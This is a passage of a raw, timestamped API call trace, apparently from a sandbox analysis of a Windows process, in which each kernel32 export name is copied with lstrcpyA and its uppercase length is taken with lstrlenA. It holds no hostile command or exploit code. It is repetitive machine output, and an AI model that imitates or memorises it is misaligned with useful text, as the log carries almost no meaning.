lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.819] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.819] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.819] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.819] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.819] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.819] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.819] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.819] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.819] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.819] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.819] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.819] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.819] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.819] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.820] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.820] lstrlenA (lpString="BEEP") returned 4 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.820] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.820] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.820] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.820] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.820] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.820] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.820] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.820] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.820] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.820] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.820] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.820] lstrlenA (lpString="CANCELIO") returned 8 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.820] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.820] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.820] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.820] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.820] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.821] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.821] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.821] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.821] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.821] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.821] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.821] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.821] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.821] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.821] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.821] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.821] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.821] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.821] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.821] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.821] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.821] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.821] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.821] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.821] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.822] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.822] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.822] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.822] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.822] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.822] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.822] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.822] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.822] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.822] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.822] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.822] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.822] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.822] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.822] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.822] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.822] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.822] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.822] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.822] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.823] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.823] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.823] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.823] lstrlenA (lpString="COPYFILEA") returned 9 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.823] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.823] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.823] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.823] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.823] lstrlenA (lpString="COPYFILEW") returned 9 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.823] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.823] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.823] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.823] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.823] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.823] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.823] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.823] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.823] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.823] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.823] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.824] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.824] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.824] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.824] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.824] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.824] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.824] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.824] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.824] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.824] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.824] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.824] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.824] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.824] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.824] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.824] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.825] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.825] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.825] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.825] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.825] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.825] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.825] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.825] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.825] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.825] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.825] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.825] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.825] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.825] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.825] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.825] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.825] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.825] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.825] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.826] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.826] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.826] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.826] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.826] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.826] lstrlenA 